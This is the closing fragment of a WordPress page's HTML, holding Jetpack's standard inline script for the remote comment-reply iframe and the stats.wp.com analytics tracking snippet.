			(function () {
				var comm_par_el = document.getElementById( 'comment_parent' ),
					comm_par = ( comm_par_el && comm_par_el.value ) ? comm_par_el.value : '',
					frame = document.getElementById( 'jetpack_remote_comment' ),
					tellFrameNewParent;

				tellFrameNewParent = function () {
					if ( comm_par ) {
						frame.src = "" + '&replytocom=' + parseInt( comm_par, 10 ).toString();
					} else {
						frame.src = "";
					}
				};

				
				if ( 'undefined' !== typeof addComment ) {
					addComment._Jetpack_moveForm = addComment.moveForm;

					addComment.moveForm = function ( commId, parentId, respondId, postId ) {
						var returnValue = addComment._Jetpack_moveForm( commId, parentId, respondId, postId ),
							cancelClick, cancel;

						if ( false === returnValue ) {
							cancel = document.getElementById( 'cancel-comment-reply-link' );
							cancelClick = cancel.onclick;
							cancel.onclick = function () {
								var cancelReturn = cancelClick.call( this );
								if ( false !== cancelReturn ) {
									return cancelReturn;
								}

								if ( ! comm_par ) {
									return cancelReturn;
								}

								comm_par = 0;

								tellFrameNewParent();

								return cancelReturn;
							};
						}

						if ( comm_par == parentId ) {
							return returnValue;
						}

						comm_par = parentId;

						tellFrameNewParent();

						return returnValue;
					};
				}

				
				// Do the post message bit after the dom has loaded.
				document.addEventListener( 'DOMContentLoaded', function () {
					var iframe_url = "https:\/\/jetpack.wordpress.com";
					if ( window.postMessage ) {
						if ( document.addEventListener ) {
							window.addEventListener( 'message', function ( event ) {
								var origin = event.origin.replace( /^http:\/\//i, 'https://' );
								if ( iframe_url.replace( /^http:\/\//i, 'https://' ) !== origin ) {
									return;
								}
								frame.style.height = event.data + 'px';
							});
						} else if ( document.attachEvent ) {
							window.attachEvent( 'message', function ( event ) {
								var origin = event.origin.replace( /^http:\/\//i, 'https://' );
								if ( iframe_url.replace( /^http:\/\//i, 'https://' ) !== origin ) {
									return;
								}
								frame.style.height = event.data + 'px';
							});
						}
					}
				})

			})();
		</script><script src='https://stats.wp.com/e-202223.js' defer></script><script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:11.0-beta',blog:'54296538',post:'277465',tz:'-4',srv:'kikotapasando.com',hp:'atomic',ac:'2',amp:'0'} ]);
	_stq.push([ 'clickTrackerInit', '54296538', '277465' ]);
</script></body>
</html>
